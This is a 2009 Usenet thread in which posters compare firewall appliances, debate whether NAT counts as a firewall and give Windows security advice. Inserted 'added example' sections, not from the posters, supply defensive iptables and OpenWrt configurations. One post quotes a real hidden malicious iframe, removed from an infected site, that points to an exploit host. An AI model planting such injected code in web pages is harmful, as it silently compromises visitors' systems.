
appliance firewall


ToddAndMargo
May 7, 2009, 7:43:55 PM
Hi All,

Can anyone recommend an appliance firewall for
a small business? Nice if it had Linux and
iptables inside.

Many thanks,
-T

Keith Keller
May 7, 2009, 11:15:48 PM
On 2009-05-07, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>
> Can anyone recommend an appliance firewall for
> a small business? Nice if it had Linux and
> iptables inside.

Anything that runs openwrt should work fine as a firewall. What exactly
do you mean by ''appliance''? Do you want it to do things other than
firewall/NAT?

--keith

--
kkeller...@wombat.san-francisco.ca.us
(try just my userid to email me)
AOLSFAQ=http://www.therockgarden.ca/aolsfaq.txt
see X- headers for PGP signature information

ToddAndMargo
May 8, 2009, 1:45:13 AM
Keith Keller wrote:
> On 2009-05-07, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>> Can anyone recommend an appliance firewall for
>> a small business? Nice if it had Linux and
>> iptables inside.
>
> Anything that runs openwrt should work fine as a firewall. What exactly
> do you mean by ''appliance''?

A box that hangs on the wall. Very little user interaction, except
maybe a web page to configure it (or some such).

> Do you want it to do things other than
> firewall/NAT?

Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
NAT *is not* a firewall.

-T

Keith Keller
May 8, 2009, 2:49:40 AM
On 2009-05-08, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>
> Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
> NAT *is not* a firewall.

Well, then you need to define your requirements if you want a reasonable
answer.

Thad Floryan
May 8, 2009, 5:12:56 AM
On May 7, 10:45 pm, ToddAndMargo <ToddAndMa...@NoSpam.verizon.net>
wrote:
> [...]

> Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
> NAT *is not* a firewall.

Then you might want this kind of product:

<http://www.sonicwall.com/>

I've installed 100s over the years and not one has ever been
compromised. Current home/SOHO model is TZ180; my TZ170 has
provided years of infallible service.

Their PRO series work great for medium-sized companies.

1PW
May 8, 2009, 5:48:59 AM
On 05/08/2009 02:12 AM, Thad Floryan sent:

Hello Thad:

At about $293USD you buy the TZ180. Then, for $490USD per year, you
rent their software and update service. At almost $800USD for the first
year's outlay, the TZ180 needs to do a lot for a SOHO.

Regards,

Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]

Thad Floryan
May 8, 2009, 8:21:23 AM
On May 8, 2:48 am, 1PW <barcrnahgjuvf...@nby.pbz> wrote:
> On 05/08/2009 02:12 AM, Thad Floryan sent:
> > [...]

> > Then you might want this kind of product:
>
> > <http://www.sonicwall.com/>
>
> > I've installed 100s over the years and not one has ever been

> > compromised. Current home/SOHO model is TZ180; my TZ170 has
> > provided years of infallible service.
>
> > Their PRO series work great for medium-sized companies.
>
> Hello Thad:
>
> At about $293USD you buy the TZ180. Then, for $490USD per year, you
> rent their software and update service. At almost $800USD for the first
> year's outlay, the TZ180 needs to do a lot for a SOHO.

It actually does, but one needn't purchase all the options. The
software has been solid for years and I never purchased the long-term
update service especially since there's a great Yahoo support group, so
the only cost (for me) has been the one-time purchase price.

Even their large rackmount units are easy to configure and are rock-solid,
hence the appellation "appliance". Much, much easier to setup than the
comparable products from Cisco and other vendors, and even setting up a
DMZ is trivial.

I was using one of their "SOHO 2" units for about 10+ years on dialup and
Sprint Broadband with VPN, 3DES, etc. and the only reason I sold that one
to a client and bought the TZ-170 was for the higher WAN speeds I now have
available.

The only annoyance is that everything on one's LAN is "seen" as a node,
including printers that use NTP, so a naive person would opt for the 25
node license instead of the stock 10 node license. What I did to get
around that was place a US$50 Linksys BEFSR41 Version 4.3 between the
TZ-170 and my LAN and now the TZ-170 thinks there's only one node even
though I have almost 50 systems here. :-)

FWIW, double-NAT has not caused any problems whatsoever with anything
I do on the 'Net (online banking, web surfing, even online gaming) and
there have been zero intrusions. Also FWIW the Sonicwall products can be
set to "stealth" mode meaning it doesn't reveal itself on the WAN.

Product longevity, reliability and low cost per year are big pluses.
It's truly a plug'n'play appliance. Mine's been up for 117 days now
and that's only because my local cable provider was offline for awhile
one evening back in February when they switched over to DOCSIS 3.0
and I didn't know what happened so I cycled the TZ-170; it normally
will stay up for years because mine is on a UPS.

Greg Russell
May 8, 2009, 1:24:57 PM
"Keith Keller" <kkeller...@wombat.san-francisco.ca.us> wrote in message
news:5okcd6x...@goaway.wombat.san-francisco.ca.us...

>> Can anyone recommend an appliance firewall for a small business?
>> Nice if it had Linux and iptables inside.
>
> Anything that runs openwrt should work fine as a firewall. What exactly
> do you mean by ''appliance''? Do you want it to do things other than
> firewall/NAT?

Ironing the clothes and washing the dishes would be nice. <g>

Really though, all seriousness aside, we simply use an old headless computer
with 2 network interfaces running CentOS and iptables, with sshd listening
on the "inboard" interface. One could also have webmin listening, but it's
never been necessary here. ssh and vi[m] handle all our editing needs for
the iptables.
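An added example, not Greg's own ruleset: a complete iptables configuration for the two-interface CentOS box he describes, generated in iptables-restore format so it can be loaded atomically (and saved as /etc/sysconfig/iptables, which the CentOS iptables service reads at boot). The interface names eth0/eth1, the LAN subnet and the helper names gen_rules/apply_rules are assumptions; the rules use the conntrack match, where older kernels need `-m state --state` instead.

```shell
#!/bin/sh
# Added example (not the poster's own ruleset): a two-NIC CentOS NAT firewall
# with sshd reachable only from the inside interface. eth0/eth1, the LAN
# subnet and the function names are assumptions chosen for illustration.

# gen_rules EXT_IF INT_IF LAN_NET
# Prints a complete ruleset in iptables-restore format (the format of
# /etc/sysconfig/iptables on CentOS, loaded by "service iptables start").
gen_rules() {
    ext="$1"; int="$2"; lan="$3"
    cat <<EOF
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
# Rewrite LAN sources to the WAN address on the way out
-A POSTROUTING -o $ext -s $lan -j MASQUERADE
COMMIT
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# Loopback, and replies to connections the box itself opened
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Packets arriving on the WAN side that claim a LAN source are spoofed
-A INPUT -i $ext -s $lan -j DROP
-A FORWARD -i $ext -s $lan -j DROP
# sshd: new connections accepted only on the inside interface
-A INPUT -i $int -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
# Let LAN hosts ping the firewall for troubleshooting
-A INPUT -i $int -p icmp -j ACCEPT
# Forwarding: LAN to WAN freely, WAN to LAN only as replies; nothing else
-A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -i $int -o $ext -s $lan -j ACCEPT
COMMIT
EOF
}

# apply_rules EXT_IF INT_IF LAN_NET
# Enables routing and loads the ruleset atomically (all or nothing).
apply_rules() {
    sysctl -w net.ipv4.ip_forward=1 >/dev/null
    gen_rules "$@" | iptables-restore
}

# Typical use on the box:  gen_rules eth0 eth1 192.168.1.0/24 > /etc/sysconfig/iptables
```

The INPUT rule that ties port 22 to the inside interface is what makes "sshd listening on the inboard interface" hold even if sshd itself binds to all addresses: the WAN side simply never answers. The ESTABLISHED,RELATED rule on FORWARD is the stateful part, letting replies to LAN-initiated connections (TCP and UDP alike) back in without accepting any unsolicited WAN traffic; that is the distinction between plain NAT and a firewall that the rest of the thread argues about.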


ToddAndMargo
May 8, 2009, 2:49:31 PM

Thank you!

mr.b
May 8, 2009, 2:49:38 PM
On Fri, 08 May 2009 05:45:13 +0000, ToddAndMargo pronounced unto the
world:

> But it must be a *real* firewall.
> NAT *is not* a firewall.

I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall

--
you could google keller +slackware ... or not

ToddAndMargo
May 8, 2009, 3:03:04 PM

No frozen yogurt?!?!?

A linux box would be way over their heads. I do this (Linux box)
for other customers, but one does have to know the limitations
of their customers.

-T

ToddAndMargo
May 8, 2009, 3:05:03 PM
mr.b wrote:
> On Fri, 08 May 2009 05:45:13 +0000, ToddAndMargo pronounced unto the
> world:
>
>> But it must be a *real* firewall.
>> NAT *is not* a firewall.
>
> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>
Hi mr.b,

I have another customer I am trying to convince he needs
a real firewall, not just a $15.00 NAT box.

Do you know of any good references I can point him to?

-T

Thad Floryan
May 8, 2009, 3:25:24 PM
On May 8, 12:03 pm, ToddAndMargo <ToddAndMa...@NoSpam.verizon.net>
wrote:
> [...]

> A linux box would be way over their heads. I do this (Linux box)
> for other customers, but one does have to know the limitations
> of their customers.

Exactly why appliances such as the Sonicwall products meet so
many people's needs. I'm not "pushing" Sonicwall's stuff though
I use them; there are other similar products from other vendors
readily available.

Google "firewall appliance" for more choices.

I've been happy with Sonicwall products for over 17 years now.

Thad Floryan
May 8, 2009, 4:01:28 PM
On May 8, 12:25 pm, Thad Floryan <t...@thadlabs.com> wrote:
> [...]

> Google "firewall appliance" for more choices.
>
> I've been happy with Sonicwall products for over 17 years now.

For those curious what a "green" (powerwise) firewall appliance
looks like (vs. a power-hungry and failure-prone PC (with its
HD and fan(s)), here's my TZ170 atop a filing cabinet and out
of the way and silent:

<http://thadlabs.com/PIX/TZ170_appliance.jpg>

Here are some of the systems being served by it:

<http://thadlabs.com/PIX/Thad_desk.jpg>

David Brown
May 8, 2009, 4:08:00 PM

*Why* do you think you need a "real" firewall, not just a $15 NAT box?

As has been said, NAT alone is not actually a firewall, but I have never
seen a NAT box that was not also a firewall. A firewall is merely a
hinder to traffic - it determines whether packets can pass through from
one interface to another (or to the device itself). A cheap NAT router
will stop packets that are trying to get in, unless they have been
explicitly allowed (using firewall rules and DNAT port forwarding).
Therefore, it *is* a firewall. It will also allow you to limit outgoing
traffic.

Of course, a cheap NAT router is not a sophisticated or advanced
firewall. It won't let you define rules such as limited numbers of
connections in a time interval (very useful for preventing dictionary
attacks on ssh, at the risk of getting a DOS), or let you automatically
blacklist addresses that attempt port scans. But it *will* do a
sufficient job for a small or simple network, and it will do it far
better than an advanced firewall - because it's simple, it's much easier
to get right.

It is correct that NAT in itself is not technically a firewall - it does
not limit or control traffic in any way. But it has the practical
functional effect of a firewall - incoming packets aimed at the firewall
that are not part of an outgoing tracked connection have nowhere to go,
and are therefore dropped (or rejected). If packets arrive at the wan
interface with an explicit target on the lan side, then a pure NAT
router would pass them on - these are not blocked by NAT. But any real
world NAT router device will block them (as these devices are also
"real" firewalls). Additionally, you can be fairly certain that your
ISP's routers and firewalls would not have passed on such packets to
your NAT router in the first place (assuming your NAT router is
connected to an ISP, obviously).

There are plenty of setups for which a $15 (or perhaps a little more -
you don't have to aim for the very cheapest) firewall/NAT router device
is *exactly* what is needed. The Internet would be a much happier place
if more people used these devices rather than connecting their windows
boxes directly to the net.

ToddAndMargo
May 8, 2009, 4:08:24 PM
Thad Floryan wrote:
> For those curious what a "green" (powerwise) firewall appliance
> looks like (vs. a power-hungry and failure-prone PC (with its
> HD and fan(s))

That is one of my fears from running an old, worn out
PC as a firewall. They are past their useful lifespan (their
use-by date has been exceeded).

It is really hard to talk a (cheap) customer into buying
a new computer for a firewall. If you do, they want to
use a $400.00 piece of junk meant for the home market
and not meant to really work at all, just to be cheap.

I would love a simple Intel Atom based mini box to
run a firewall on: no fans, no mechanical hard drive,
stripped down CentOS, and two network adapters.
But, in my dreams only.

In the mean time, I will stick with appliance firewalls
for those customers who have such limitations.

-T

ToddAndMargo
May 8, 2009, 4:09:00 PM
mr.b wrote:
> On Fri, 08 May 2009 05:45:13 +0000, ToddAndMargo pronounced unto the
> world:
>
>> But it must be a *real* firewall.
>> NAT *is not* a firewall.
>
> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>

I did not think he was. Sorry for the mis-understanding.

ToddAndMargo
May 8, 2009, 4:15:58 PM
David Brown wrote:

> Of course, a cheap NAT router is not a sophisticated or advanced
> firewall. It won't let you define rules such as limited numbers of
> connections in a time interval (very useful for preventing dictionary
> attacks on ssh, at the risk of getting a DOS), or let you automatically
> blacklist addresses that attempt port scans. But it *will* do a
> sufficient job for a small or simple network, and it will do it far
> better than an advanced firewall - because it's simple, it's much easier
> to get right.
>
> It is correct that NAT in itself is not technically a firewall - it does
> not limit or control traffic in any way. But it has the practical
> functional effect of a firewall - incoming packets aimed at the firewall
> that are not part of an outgoing tracked connection have nowhere to go,
> and are therefore dropped (or rejected). If packets arrive at the wan
> interface with an explicit target on the lan side, then a pure NAT
> router would pass them on - these are not blocked by NAT. But any real
> world NAT router device will block them (as these devices are also
> "real" firewalls). Additionally, you can be fairly certain that your
> ISP's routers and firewalls would not have passed on such packets to
> your NAT router in the first place (assuming your NAT router is
> connected to an ISP, obviously).

NAT can be spoofed

>
> There are plenty of setups for which a $15 (or perhaps a little more -
> you don't have to aim for the very cheapest) firewall/NAT router device
> is *exactly* what is needed. The Internet would be a much happier place
> if more people used these devices rather than connecting their windows
> boxes directly to the net.

I concur completely.

It would also help if Windows users would buy themselves a good software
firewall to go along with it.

I have a small business customer with several Windows computers
that only get used once a day to post a report to the Internet.
The rest of the time they are sitting there collecting viruses.
Among other things, I am trying to get him to get a real firewall.
His NAT router is not working so well. Given enough time and enough
exposure, Windows machines have a habit of collecting viruses,
even with NAT.

-T

Thad Floryan
May 8, 2009, 4:28:05 PM
On May 8, 1:08 pm, ToddAndMargo <ToddAndMa...@NoSpam.verizon.net>
wrote:
> [...]

> In the mean time, I will stick with appliance firewalls
> for those customers who have such limitations.

Appliance firewalls are not just for customers with "limitations",
they're also for those who want a plug'n'play solution that can be
setup and literally almost forgotten -- time is too precious to be
spent hassling with buggy and/or error-prone software.

I've been using computers since the early 1960s, and both UNIX and
Linux since their respective day ones, and an appliance is, well,
an appliance that I don't have to worry about. :-)

I'm quite technically competent (being the last IT person at
Levanta (formerly Linuxcare) who was called in to shut the place
down on its last day of business March 31, 2008), and with a
solid firewall appliance there are simply no worries since the
product(s) is/are certified stateful packet inspectors.

Keith Keller
May 8, 2009, 5:34:40 PM
On 2009-05-08, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
> mr.b wrote:
>>
>> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>
> I did not think he was. Sorry for the mis-understanding.

That's correct, I wasn't. I also apologize for the misunderstanding. :)

It seems like the Sonicwall solution is close to what you want (I've
never used one, but have heard good things about them from others), so
this answer won't really help you, but perhaps it'll help others.

Remember that there's a bit of confusion as to what a ''firewall'' does.
Some people believe it's just NAT; others believe it's just
NAT+iptables; still others believe it's NAT+iptables+application-level
packet filtering. So when you (or others) need these functions, you
should specify which functions you want.

Now, as for OpenWRT, it's a minimal but fairly thorough linux
distribution meant for typical residential NAT/router devices, like the
Linksys WRT54G. Since it's a linux flavor, it can do everything that
linux can do, as long as you can fit it into the memory or storage space
of the device. NAT and iptables are standard; I do not know if there is
application-level filtering available. The upshot is that anything you
can do with iptables, you can do with OpenWRT. You can also do things
that the default firmware that comes with some devices can not.

A web interface is also available. The interface for the version I
currently use is not 100% straightforward for a n00b to use, but if you
configure the device for someone to drop in, it should really be just
like an appliance for the end-user. (I'm on White Russian, so the
Kamikaze interface might be more self-explanatory.)

David Brown
May 9, 2009, 7:24:16 AM
ToddAndMargo wrote:
> David Brown wrote:
>
>> Of course, a cheap NAT router is not a sophisticated or advanced
>> firewall. It won't let you define rules such as limited numbers of
>> connections in a time interval (very useful for preventing dictionary
>> attacks on ssh, at the risk of getting a DOS), or let you
>> automatically blacklist addresses that attempt port scans. But it
>> *will* do a sufficient job for a small or simple network, and it will
>> do it far better than an advanced firewall - because it's simple, it's
>> much easier to get right.
>>
>> It is correct that NAT in itself is not technically a firewall - it
>> does not limit or control traffic in any way. But it has the
>> practical functional effect of a firewall - incoming packets aimed at
>> the firewall that are not part of an outgoing tracked connection have
>> nowhere to go, and are therefore dropped (or rejected). If packets
>> arrive at the wan interface with an explicit target on the lan side,
>> then a pure NAT router would pass them on - these are not blocked by
>> NAT. But any real world NAT router device will block them (as these
>> devices are also "real" firewalls). Additionally, you can be fairly
>> certain that your ISP's routers and firewalls would not have passed on
>> such packets to your NAT router in the first place (assuming your NAT
>> router is connected to an ISP, obviously).
>
> NAT can be spoofed

It's possible to spoof NAT, and there are all sorts of other possible
problems that could cause trouble for your little NAT router (DOS
attacks, syn floods, whatever). But for the typical situation of a
small network connected to an ISP using one of these routers, you are
not going to get spoofed packets coming in - your ISP is going to have a
better firewall setup (if not, what are you paying them for?).

Also (for any others reading this - ToddAndMargo obviously knows) NAT
does not help for limiting outgoing traffic, or if there are knowledgeable
and malicious people on the inside of the network (or between the router
and the ISP). These devices can use their firewall to limit the damage
from problems on the inside, however - in particular, you can block port
25 aimed at anything other than the ISP's mail server and thus avoid any
infected Windows machine sending out spam.

>
>>
>> There are plenty of setups for which a $15 (or perhaps a little more -
>> you don't have to aim for the very cheapest) firewall/NAT router
>> device is *exactly* what is needed. The Internet would be a much
>> happier place if more people used these devices rather than connecting
>> their windows boxes directly to the net.
>
> I concur completely.
>
> It would also help if Windows users would be themselves a good software
> firewall to go along with it.
>

I'm not so sure about the "good software firewall" part. The key point
in firewalling is to block incoming packets - windows built-in firewall
does a perfectly good job of that. I have yet to see any third-party
windows firewall software that does it better - and I have heard of many
cases of third-party firewall software having its own bugs and holes
that allow attacks through. If simple is good enough, then simple is
better than complex.

The other thing that many third-party software firewalls get wrong is
that they try too hard - the user is bombarded with questions about
applications trying to access different web sites, and quickly learns to
blindly click OK without reading the message. Finally frustrated over
so many irritating boxes, he then turns off the firewall completely.

That is why I believe software firewalls on windows are virtually
useless, with the built-in one being somewhat less useless than others.
And it is also one reason why a cheap router device is so much better
than anything software on a windows machine.

> I have a small business customer with several Windows computers
> that only get used once a day to post a report to the Internet.
> The rest of the time they are sitting there collecting viruses.
> Among other things, I am trying to get him to get a real firewall.
> His NAT router is not working so well. Given enough time and enough
> exposure, Windows machines to have a habit of collecting viruses,
> even with NAT.
>

Viruses don't get through a NAT router - you get them (mostly) from
dodgy emails, or via infected files, or occasionally from autorun
viruses on USB devices. Worms are the ones that travel directly from
machine to machine over a network, and a NAT router *will* block these
(barring theoretical but highly unlikely cases).

I would be extremely surprised if a "better" firewall would give the
slightest benefit in this case. You might be able to improve things
with some configuration of the firewall - blocking port 25 except to the
ISP's mail server is an obvious start. Changing the DNS server on the
router to OpenDNS with restricted access would also help. But the
biggest changes are to the windows machines themselves, and more
importantly, to the users.

The key rules for using a windows machine safely are:

Never connect one directly to the internet (always use a NAT router
device, or a *nix machine with a firewall).

Never use Internet Explorer (except if it is totally unavoidable, and
then only for that one particular site). Use Firefox or Opera. Also
lock down Internet Explorer with its highest security settings, since
there is no way to remove it entirely. Remove the desktop icon and
start menu entry for it - that stops most amateurs.

Never use Outlook Express or Outlook for email from external sources.
They are far too happy to run attached malware or visit malware links,
and they freely give out all contact information to any malware that
asks. Thunderbird is my email client of choice, but there are other
options.

Ensure that all incoming email has passed through a good anti-virus
filter (not on the PC itself, but at the ISP or email server). If
possible, have the filter strip all executable attachments (exe, dll,
scr, bat, cpl, com, cmd).

Ensure that the "hide extensions of known file types" option is off for
*all* directories.

No PC's from outside are ever allowed on the internal LAN. No PC's on
the LAN are ever allowed to connect to any other networks. If someone
needs a portable that must be connected to other networks, assume it is
always infected and never give it direct contact with other computers.

Make sure the users understand these rules, and the importance of them -
and equate breaking these rules with leaving the building unlocked.

Make sure that they understand the importance of responsible net usage -
visiting "adult entertainment" sites from work computers is no more
acceptable than inviting "adult entertainment" visitors into the
building. OpenDNS can help enforce this (and avoid accidents).

Make sure that they understand the importance of reporting problems or
suspected problems with the machines, and that it is far better to
report accidental security problems (typos when entering web addresses
are easy to do) than to try to cover it up.


Note that I don't include any of the "traditional" rules, such as
anti-virus software, software firewalls, or automatic windows updates on
this list.


Until your windows machines and their users are this safe, your worries
about a better firewall than a cheap NAT router are wasted effort.

mvh.,

David
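An added example, not David's own configuration, showing in iptables the three controls he says a cheap NAT router lacks: limiting new ssh connections per source per minute, automatically blacklisting sources that probe closed ports, and (from his later point about infected machines sending spam) allowing outbound port 25 only to the ISP's mail relay. Interface names, the relay address 203.0.113.25, and the function and chain names are assumptions; the fragment is the filter table only and leaves NAT to whatever the box already loads.

```shell
#!/bin/sh
# Added example, not from the thread: filter-table rules of the kind David
# Brown says a cheap NAT router cannot express. Interface names, the relay
# address and the function/chain names are assumptions for illustration;
# the NAT table is left to whatever the box already loads.

# gen_hardening_rules EXT_IF INT_IF ISP_SMTP_RELAY
# Prints an iptables-restore filter table with three controls:
#   1. new ssh connections from the WAN limited to 4 per source per minute
#   2. sources that probe other closed ports dropped for an hour
#   3. outbound SMTP from the LAN allowed only to the ISP's relay
gen_hardening_rules() {
    ext="$1"; int="$2"; relay="$3"
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:SSH_LIMIT - [0:0]
:SCAN_TRAP - [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i $int -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
# 2a. A source already recorded as a scanner gets nothing for 3600 s
-A INPUT -i $ext -m recent --name SCANNERS --rcheck --seconds 3600 -j DROP
# 1. New ssh from the WAN goes through the rate limiter
-A INPUT -i $ext -p tcp --dport 22 -m conntrack --ctstate NEW -j SSH_LIMIT
-A SSH_LIMIT -m recent --name SSH --set
-A SSH_LIMIT -m recent --name SSH --update --seconds 60 --hitcount 5 -j LOG --log-prefix "ssh-ratelimit: "
-A SSH_LIMIT -m recent --name SSH --update --seconds 60 --hitcount 5 -j DROP
-A SSH_LIMIT -j ACCEPT
# 2b. Any other unsolicited WAN packet is a probe: record the source, log, drop
-A INPUT -i $ext -m conntrack --ctstate NEW -j SCAN_TRAP
-A SCAN_TRAP -m recent --name SCANNERS --set -j LOG --log-prefix "portscan: "
-A SCAN_TRAP -j DROP
# 3. Port 25 out of the LAN only to the ISP relay; everything else is reset and logged
-A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -i $int -o $ext -p tcp --dport 25 -d $relay -j ACCEPT
-A FORWARD -i $int -o $ext -p tcp --dport 25 -j LOG --log-prefix "smtp-blocked: "
-A FORWARD -i $int -o $ext -p tcp --dport 25 -j REJECT --reject-with tcp-reset
-A FORWARD -i $int -o $ext -j ACCEPT
COMMIT
EOF
}

# Load with:  gen_hardening_rules eth0 eth1 203.0.113.25 | iptables-restore
```

Two caveats match David's own warnings. The recent match counts per source address, so a whole office behind one NAT that fumbles a password a few times locks itself out for the minute: that is the "risk of getting a DOS" he mentions, and why the window is kept short. The scanner trap treats any single unsolicited packet as a probe, which will occasionally catch an innocent host (stray traffic aimed at a previous holder of your address, for instance), so it logs every entry and expires after an hour rather than blocking permanently. The port 25 rule is the cheapest win on the list: an infected Windows box on the LAN can still be infected, but it can no longer act as a spam engine, and the "smtp-blocked:" log lines tell you which machine to look at.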


David Brown
May 9, 2009, 8:19:43 AM
Keith Keller wrote:
> On 2009-05-08, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>> mr.b wrote:
>>> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>> I did not think he was. Sorry for the mis-understanding.
>
> That's correct, I wasn't. I also apologize for the misunderstanding. :)
>
> It seems like the Sonicwall solution is close to what you want (I've
> never used one, but have heard good things about them from others), so
> this answer won't really help you, but perhaps it'll help others.
>
> Remember that there's a bit of confusion as to what a ''firewall'' does.
> Some people believe it's just NAT; others believe it's just
> NAT+iptables; still others believe it's NAT+iptables+application-level
> packet filtering. So when you (or others) need these functions, you
> should specify which functions you want.
>
> Now, as for OpenWRT, it's a minimal but fairly thorough linux
> distribution meant for typical residential NAT/router devices, like the
> Linksys WRT54G. Since it's a linux flavor, it can do everything that
> linux can do, as long as you can fit it into the memory or storage space
> of the device. NAT and iptables are standard; I do not know if there is
> application-level filtering available. The upshot is that anything you
> can do with iptables, you can do with OpenWRT. You can also do things
> that the default firmware that comes with some devices can not.
>

The two features I particularly like with OpenWRT (rather than the
standard WRT54GL firmware) are OpenVPN support, and VLANs. You can
treat each LAN port as a separate NIC rather than as a switch, thus
isolating network segments (except as allowed by your firewall). This
means, for example, that your teenage kid's machines can be on a
separate LAN from your "serious" PC. And OpenVPN support makes it very
easy to set up VPNs - a WRT54GL makes a perfectly good OpenVPN server or
client. Combining these you can have one Ethernet port that is
effectively connected to a remote LAN while the others are ordinary
NAT'ed ports.

> A web interface is also available. The interface for the version I
> currently use is not 100% straightforward for a n00b to use, but if you
> configure the device for someone to drop in, it should really be just
> like an appliance for the end-user. (I'm on White Russian, so the
> Kamikaze interface might be more self-explanatory.)
>

Kamikaze itself doesn't have a very newbie-friendly interface either,
although I believe there is a nicer web interface available. There are
several other related firewall distros for these sorts of devices, some
of which have easier configuration. Personally, I prefer a nice ssh and
shell access to a web interface, so I haven't looked too hard at these.
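An added example, not OpenWrt's stock configuration and not from either poster: the port isolation David describes (one switch port on its own VLAN and subnet, able to reach the WAN but not the main LAN), written as UCI fragments that a script appends to the network, dhcp and firewall config files. It uses the swconfig-style switch_vlan sections and firewall zones of later OpenWrt releases rather than the switch syntax of the White Russian/Kamikaze firmware named above; the switch port numbers, the eth0.3 interface name, the 192.168.3.0/24 subnet and the function name are assumptions and differ by model.

```shell
#!/bin/sh
# Added example, not OpenWrt's or the poster's configuration: isolates one
# switch port into its own VLAN/interface and uses firewall zones so the
# isolated segment reaches the WAN but not the main LAN. Port numbers,
# subnet, interface name and file locations are assumptions; switch port
# numbering differs between router models.

# write_isolated_segment [CONFIG_DIR]
# Appends UCI fragments to CONFIG_DIR/network, /dhcp and /firewall
# (default /etc/config). Reload afterwards with /etc/init.d/network restart
# and /etc/init.d/firewall restart.
write_isolated_segment() {
    dir="${1:-/etc/config}"

    cat >>"$dir/network" <<'EOF'

# Assumed switch layout: ports 0-2 stay in the LAN VLAN, port 3 becomes
# the isolated "guest" VLAN, port 5 is the CPU port (tagged on both VLANs).
config switch_vlan
    option device 'eth0'
    option vlan '1'
    option ports '0 1 2 5t'

config switch_vlan
    option device 'eth0'
    option vlan '3'
    option ports '3 5t'

config interface 'guest'
    option ifname 'eth0.3'
    option proto 'static'
    option ipaddr '192.168.3.1'
    option netmask '255.255.255.0'
EOF

    cat >>"$dir/dhcp" <<'EOF'

config dhcp 'guest'
    option interface 'guest'
    option start '100'
    option limit '50'
    option leasetime '12h'
EOF

    cat >>"$dir/firewall" <<'EOF'

# Guest zone: the router answers DHCP and DNS from it, forwards nothing by
# default, and the single forwarding section allows guest -> wan only.
# There is deliberately no forwarding with dest 'guest' or dest 'lan'.
config zone
    option name 'guest'
    option network 'guest'
    option input 'REJECT'
    option output 'ACCEPT'
    option forward 'REJECT'

config forwarding
    option src 'guest'
    option dest 'wan'

config rule
    option name 'guest-dhcp-dns'
    option src 'guest'
    option proto 'udp'
    option dest_port '53 67'
    option target 'ACCEPT'
EOF
}
```

The isolation comes from two places working together: the switch_vlan sections stop the hardware switch from bridging port 3 to the other ports at layer 2, and the zone with forward REJECT plus the absence of any forwarding whose dest is lan stops the kernel from routing between the two subnets at layer 3. Dropping either half leaves a path; David's OpenVPN-bound port would be set up the same way, with the forwarding's dest being the VPN zone instead of wan.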

Robert
May 9, 2009, 12:33:51 PM

Why do you say that? NAT is part of the firewall.

I believe you are looking at this all wrong. What external services do
you need to be able to access the inside? If nothing you can only
strengthen the firewall by using NAT'ing. Nothing should ever need access
to the inside network if you are doing things properly.


--

Regards
Robert

Linux User #296285
http://counter.li.org

ToddAndMargo
May 9, 2009, 6:44:30 PM
Wow! Thank you.

I heard it rumored that w7rc has a button to remove IE. But
have not been able to verify it.

-T

David Brown
May 9, 2009, 7:11:30 PM

I've kept my company's network of about 50 windows PC's (the Linux
servers and occasional Linux desktop don't really count, as they are too
easy to keep safe) almost entirely malware-free for about 15 years using
basically these rules, and wire-cutters for those who disobey. The only
serious virus problem we ever had was a Word and Excel macro virus -
that was before we switched to OpenOffice as the standard office package.

> I heard it rumored that w7rc has a button to remove IE. But
> have not been able to verify it.
>

Don't believe it - IE is ingrained in windows. They can hide the icon,
but they can't remove the html engine that blindly does whatever a
malware site asks, and in particular the ActiveX system which is
fundamentally broken from a security viewpoint.


Thad Floryan
May 9, 2009, 8:44:30 PM
On May 9, 4:11 pm, David Brown <david.br...@hesbynett.removethisbit.no> wrote:
> ToddAndMargo wrote:
> [...]

> > I heard it rumored that w7rc has a button to remove IE. But
> > have not been able to verify it.
>
> Don't believe it - IE is ingrained in windows. They can hide the icon,
> but they can't remove the html engine that blindly does whatever a
> malware site asks, and ...

That's for sure. The IFRAME exploit is appearing on a lot of
websites since early April 2009. Following is an actual sample
of code I removed recently from one person's infected website,
with a space between "." and "cn" for safety:

... iframe src="http://hotslotpot. cn/in.cgi?income64"
width=1 height=1 style="visibility: hidden"></iframe ...

Basically, the above silently downloads either a PDF or a SWF
file (after interrogating the browser's plugins) and performs
a buffer overflow exploit akin to the Morris Internet Worm of
1988. The exploit uses Adobe Reader (all versions since at
least 6.* up to the latest version 9.1.0) and executes malware
on the client system. This affects Linux, too; here's just one
example re: Gentoo:

<http://seclists.org/bugtraq/2009/Apr/0190.html>

No system is truly safe from attacks like the above exploit.


David Brown
May 10, 2009, 7:24:40 AM

That's a nasty security hole! It also shows that Linux systems are not
impervious to malware (though they are *much* safer, and certainly don't
need anti-virus software and all the other "security" junk windows users
often believe helps).

It's a shame that Adobe has tried to turn the pdf format from something
it did extremely well (acting as an efficient and portable electronic
printout format) into something totally unsuited. It doesn't take a
genius to understand that increasing scripting in a format makes it more
likely to have security problems.

Fortunately, there are alternatives to Acrobat Reader, such as Evince,
kpdf and okular for Linux, and Foxit for Windows (I recently started
